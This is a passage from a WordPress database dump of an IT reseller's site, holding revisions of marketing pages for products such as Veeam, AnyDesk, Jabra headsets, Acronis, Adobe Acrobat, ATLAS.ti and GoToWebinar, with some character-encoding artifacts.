class=\"section-title__title-block\">\r\n<h4 class=\"section-title__title section-title__title--gray\">Hyper-Availability is mission-critical for todayâ€™s business</h4>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div class=\"veeam-text \">There\'s a new expectation of today\'s data that it moves to a new state of intelligence, able to automatically anticipateÂ needÂ and meet demand, and move securely across multi-cloud infrastructures. Resulting in the insights you need to speed up the pace of innovation and deliver new digital services and experiences.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div class=\"veeam-text base-component parbase aem-GridColumn--offset--tablet--0 aem-GridColumn--default--none aem-GridColumn--phone--none aem-GridColumn--phone--6 aem-GridColumn--tablet--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--tablet--6 aem-GridColumn--offset--phone--0 aem-GridColumn--offset--default--0\">\r\n<div class=\" veeam-component__component-spacing-below--ss\">\r\n<div></div>\r\n</div>\r\n<div>\r\n<h4>Availability solutions that fit your business needs and budget</h4>\r\n<h4><strong>Small Business</strong></h4>\r\n<strong>Veeam Backup Essentials</strong>\r\n<ul>\r\n 	<li>Manage the ever-increasing backup complexity of your small business (250 employees or less)</li>\r\n 	<li>Save up to 60% for the same enterprise-level functionality and scalability</li>\r\n 	<li>Get Hyper-Availability for ALL of your workloads â€” virtual, physical and cloud</li>\r\n</ul>\r\n<h4><strong>Medium Enterprise</strong></h4>\r\n<strong>Veeam Backup &amp; Replication</strong>\r\n<ul>\r\n 	<li>Manage ALL virtual, physical, and cloud-based workloads from a single console</li>\r\n 	<li>Restore entire VMs, individual files and everything in between</li>\r\n 	<li>View and recover application items from backups or replicas without needing to restore the whole a virtual machine</li>\r\n</ul>\r\n<h4><strong>Large Enterprise</strong></h4>\r\n<strong>Veeam Availability Suite</strong>\r\n<ul>\r\n 	<li>Take control of your entire virtual, physical and cloud backup environment</li>\r\n 	<li>Achieve disaster recovery of any IT service and related applications and data within seconds and minutes</li>\r\n 	<li>Respond proactively to potential problems with real-time monitoring, reports and alerts</li>\r\n</ul>\r\n</div>\r\n</div>\r\n[maxbutton id=\"1\" ]','Veeam','','inherit','closed','closed','','1608-revision-v1','','','2018-12-14 10:51:03','2018-12-14 02:51:03','',1608,'https://bintara.com.my/blog/2018/12/14/1608-revision-v1/',0,'revision','',0),(1756,1,'2019-09-18 15:08:49','2019-09-18 07:08:49','<h1>Anydesk</h1>\n\n &nbsp;\n\n<h3 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h3>\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\n\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h4>\n<div class=\"u-color-mid-gray\">\n\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\n\n</div>\n &nbsp;\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\n<div class=\"u-color-mid-gray\">\n\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h4>\n<div class=\"u-color-mid-gray\">\n\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h4>\n<div class=\"u-color-mid-gray\">\n\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\n<h4 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h4>\n<div class=\"u-color-mid-gray\">\n\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\n\n</div>\n&nbsp;\n\n[maxbutton id=\"1\" ]\n\n</div>\n</div>\n</div>\n</div>','Anydesk','','inherit','closed','closed','','1437-autosave-v1','','','2019-09-18 15:08:49','2019-09-18 07:08:49','',1437,'https://bintara.com.my/blog/2018/12/12/1437-autosave-v1/',0,'revision','',0),(2868,1,'2019-02-11 11:37:34','2019-02-11 03:37:34','<h2>Jabra.</h2><h3>Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul><h3>Jabra Evolve 65t</h3><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" />											\n		<h3>Jabra Evolve 80</h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 75e</h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" />											\n		<h3>Jabra Evolve 75</h3><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 65 Stereo / Mono</h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" />											\n		<h3>Jabra Evolve 40 Stereo / Mono</h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 30 Stereo / Mono</h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_30_.png\" alt=\"\" />											\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" />											\n		<h3>Jabra Evolve 20 Stereo / Mono</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p><h3>Jabra Evolve 20 SE</h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p><strong>[maxbutton id=\"14\"]</strong></p>		\n										<img width=\"150\" height=\"150\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png 400w\" sizes=\"(max-width: 150px) 100vw, 150px\" />','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-02-11 11:37:34','2019-02-11 03:37:34','',1532,'https://bintara.com.my/blog/2019/02/11/1532-revision-v1/',0,'revision','',0),(2867,1,'2019-02-11 11:36:43','2019-02-11 03:36:43','','_Evolve_20_SE_Mono','','inherit','closed','closed','','_evolve_20_se_mono','','','2019-02-11 11:36:43','2019-02-11 03:36:43','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png',0,'attachment','image/png',0),(2110,1,'2018-12-13 23:45:08','2018-12-13 15:45:08','<h2>Acronis Backup Software for Business</h2>\r\n<h2></h2>\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-13 23:45:08','2018-12-13 15:45:08','',1435,'https://bintara.com.my/blog/2018/12/13/1435-revision-v1/',0,'revision','',0),(1759,1,'2018-12-12 14:50:50','2018-12-12 06:50:50','Next-Generation Firewall, Cloud Security, Endpoint Protection. Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1703\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Palo-Alto.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','PALO ALTO','','inherit','closed','closed','','1416-autosave-v1','','','2018-12-12 14:50:50','2018-12-12 06:50:50','',1416,'https://bintara.com.my/blog/2018/12/12/1416-autosave-v1/',0,'revision','',0),(1792,1,'2018-12-12 11:28:43','2018-12-12 03:28:43','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"216\" height=\"211\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud servicesÂ <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-12 11:28:43','2018-12-12 03:28:43','',1436,'https://bintara.com.my/blog/2018/12/12/1436-revision-v1/',0,'revision','',0),(1753,1,'2018-12-12 10:02:36','2018-12-12 02:02:36','<h1>What is ATLAS.ti?</h1>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n<h2 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h2>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n<h2 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h2>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n<h2 id=\"Powerful-Tool-set\">Powerful Tool set</h2>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n<h2 id=\"Unique-Features\">Unique Features</h2>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n<h2 id=\"Team-Work\">Team Work</h2>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n<h2 id=\"Long-Data-Lifespan\">Long Data Lifespan</h2>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n<h2 id=\"Great-User-Support\">Great User Support</h2>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n<h3>Instructional material</h3>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n<h3>Support Center</h3>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n<h3>Shared Expertise</h3>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2018-12-12 10:02:36','2018-12-12 02:02:36','',1443,'https://bintara.com.my/blog/2018/12/12/1443-revision-v1/',0,'revision','',0),(1736,1,'2018-12-12 09:13:10','2018-12-12 01:13:10','','KASPERSKY','','inherit','closed','closed','','1395-autosave-v1','','','2018-12-12 09:13:10','2018-12-12 01:13:10','',1395,'https://bintara.com.my/blog/2018/12/12/1395-autosave-v1/',0,'revision','',0),(1976,1,'2018-12-12 17:40:41','2018-12-12 09:40:41','','Teamviewer page','','inherit','closed','closed','','teamviewer-page-2','','','2018-12-12 17:40:41','2018-12-12 09:40:41','',1633,'https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page-1.png',0,'attachment','image/png',0),(1977,1,'2018-12-12 17:41:01','2018-12-12 09:41:01','','gotowebinar','','inherit','closed','closed','','gotowebinar-3','','','2018-12-12 17:41:01','2018-12-12 09:41:01','',1633,'https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png',0,'attachment','image/png',0),(1978,1,'2018-12-12 17:43:26','2018-12-12 09:43:26','<h3 class=\"section-header__subheadline\">Our easy-to-use technology allows you to actually have fun presenting. And our fully interactive features ensure you keep attendees glued to their screen.</h3>\r\nGoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a lot of fun along the way.\r\n\r\n<img class=\" wp-image-1977 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png\" alt=\"\" width=\"434\" height=\"298\" />\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Engagement Dashboard -- Keep an eye on attentiveness, hands raised and time elapsed.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Presenter Webcams -- Show off your bright smile and invite panelists to do the same.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\">Polls &amp; Surveys -- Engage your audience with slide-in questions and live results.</li>\r\n</ul>\r\n<iframe src=\"https://www.youtube.com/embed/uDdg_Z2KzHs\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>','GoToWebinar','','inherit','closed','closed','','1633-revision-v1','','','2018-12-12 17:43:26','2018-12-12 09:43:26','',1633,'https://bintara.com.my/blog/2018/12/12/1633-revision-v1/',0,'revision','',0),(1980,1,'2018-12-12 19:50:08','2018-12-12 11:50:08','.project-4-column .project-item { width: 16.6% ; }\n\n.project-wrapper .project-header .project-small-title { font-size: 10px; } \n\n.entry-content table tr{\n    border: none;\n}','onepress','','publish','closed','closed','','onepress','','','2019-10-01 09:33:32','2019-10-01 01:33:32','',0,'https://bintara.com.my/blog/2018/12/12/onepress/',0,'custom_css','',0),(1981,1,'2018-12-12 19:50:08','2018-12-12 11:50:08','.project-3-column .project-item { width: 16.6% ; }','onepress','','inherit','closed','closed','','1980-revision-v1','','','2018-12-12 19:50:08','2018-12-12 11:50:08','',1980,'https://bintara.com.my/blog/2018/12/12/1980-revision-v1/',0,'revision','',0),(1739,1,'2018-12-12 09:20:55','2018-12-12 01:20:55','<h1>What is ATLAS.ti?</h1>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n<h2 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h2>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding hundreds of documents, audio clips or photos, ATLAS.ti will never let you down!\r\n\r\nWork withÂ <strong>text documents in all major formats</strong>â€“including txt,.doc, .docx, .odt, and, of course, .pdf. Perform fully automated searches across one or multiple documents, auto-coding, and other powerful semantic operations to extract meaning.\r\n\r\nEnjoy the freedom of working withÂ <strong>dozens of graphic and audio formats</strong>Â (.wav, ,mp3, .wma, etc.) as well as most common video types (.avi, .mp4, .wmv, etc.).\r\n\r\nYou canÂ <strong>import data from Evernote, Twitter,</strong>Â and your favorite Reference Manager for aÂ <strong>literature review</strong>Â . OrÂ <strong>import entire surveys</strong>Â to analyze answers to open-ended questions.\r\n<h2 id=\"Explore-Material-In-Great-Depth\">Explore Material In Great Depth</h2>\r\nGet to know your material in tremendous depth. Code systematically and develop aÂ <strong>system of meaning</strong>Â that unlocks your specific research subject.Â <strong>Explore</strong>Â your data with the Network Editor, the Text Search Tool, word clouds, word frequency tables, and through the various query options.\r\n\r\nThese tools will help you toÂ <strong>discover</strong>Â the intricate hidden â€œtextureâ€ of your data, its interwoven meanings.\r\n<h2 id=\"Powerful-Tool-set\">Powerful Tool set</h2>\r\nATLAS.ti offers a set of tools and features that are powerful and flexible enough to get to the bottom of even the most complex data material.\r\n\r\nYour central workspace in ATLAS.ti serves as a container for your projectâ€™s data. Access to all basic project components such as your documents, highlighted/coded data segments, codes, memos, hyperlinks, groups, or networks is fast and comfortable.\r\n\r\n<strong>Coding</strong>Â can be done by simply dragging codes onto the selected piece of data. Object Managers, the Project Explorer, and the Co-occurrence Explorer let you browse and navigate through your project data.\r\n\r\n<strong>Link</strong>Â your findings in aÂ <strong>semantically meaningful way</strong>.\r\n\r\n<strong>Visualize</strong>Â your findings and interpretations in a digital mind map as you go.\r\n<h2 id=\"Unique-Features\">Unique Features</h2>\r\nTheÂ <strong>interactive margin area</strong>Â is a unique work space in ATLAS.ti not surpassed by any other program on the market. It permits a uniquely intuitive way of interacting with your data, digitally transferring the traditional paper-and-pen analogy in the digital world.\r\n\r\nTheÂ <strong>quotation level</strong>Â is also radically unique to ATLAS.ti. If offers an analytic level below coding and better supports inductive, interpretive research approaches like grounded theory, hermeneutic, discourse analysis, sociology of knowledge, or phenomenology than any other software.\r\n\r\nThis can also be said about the ATLAS.tiÂ <strong>network / visualization</strong>Â function. It offers the most integrated way of working with your data, it is a tool for visualization as well as for analysis, for data organization as well as conceptual level analytic work and data presentation.\r\n\r\nBecause of the way ATLAS.ti manages data under the hood, it allows for handling muchÂ <strong>larger projects</strong>Â than other products: ATLAS.ti handle projects that contain thousands of documents and/or tens of thousands of coded data segments.\r\n<h2 id=\"Team-Work\">Team Work</h2>\r\nATLAS.ti supportsÂ <strong>collaborative work</strong>Â in several highly effective ways. Dedicated tools as well as some general principles of the software make collaborations a breeze.\r\n<h2 id=\"Long-Data-Lifespan\">Long Data Lifespan</h2>\r\nTo supportÂ <strong>multi-method multi-user projects across space and time (longitudinal studies)</strong>, project data export using XML is available. With XML, the proprietary nature of most software systems can be mitigated. This is indeed a mandatory need in scientific settings. ATLAS.tiâ€™s dedicated XML schema influenced the development of theÂ QuDEXÂ language for the purpose of archiving qualitative data.\r\n<h2 id=\"Great-User-Support\">Great User Support</h2>\r\nATLAS.ti comes withÂ <strong>unsurpassed service</strong>Â andÂ <strong>multiple sources of support</strong>. Get a first overview of the software during one of ourÂ free webinarÂ hold in different languages.\r\n<h3>Instructional material</h3>\r\nOurÂ Quick TourÂ and the many videos on ourÂ YouTube channelÂ will help you to quickly master the software.\r\n<h3>Support Center</h3>\r\nIf you have questions not covered, you can write to ourÂ Support CenterÂ twenty-four hours a day, or call ourÂ telephone supportÂ during office hours.\r\n\r\nOurÂ <strong>Support Center</strong>Â lets you conveniently contact our developers and our competent support staff via a state-of-the-art helpdesk system, guaranteeing swift turnaround and short response times.\r\n<h3>Shared Expertise</h3>\r\nFurther, peer-to-peer support is available through theÂ <strong>ATLAS.ti User Forum</strong>Â with thousands of members. TheÂ ATLAS.ti Research BlogÂ offers a range of articles written by ATLAS.ti users world-wide in a large variety of topics.\r\n\r\n<iframe src=\"https://www.youtube.com/embed/guyThxVJj2w\" width=\"932\" height=\"524\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','ATLAS.ti','','inherit','closed','closed','','1443-revision-v1','','','2018-12-12 09:20:55','2018-12-12 01:20:55','',1443,'https://bintara.com.my/blog/2018/12/12/1443-revision-v1/',0,'revision','',0),(1738,1,'2018-12-12 09:19:02','2018-12-12 01:19:02','<h1>What is ATLAS.ti?</h1>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n<h2 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h2>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â 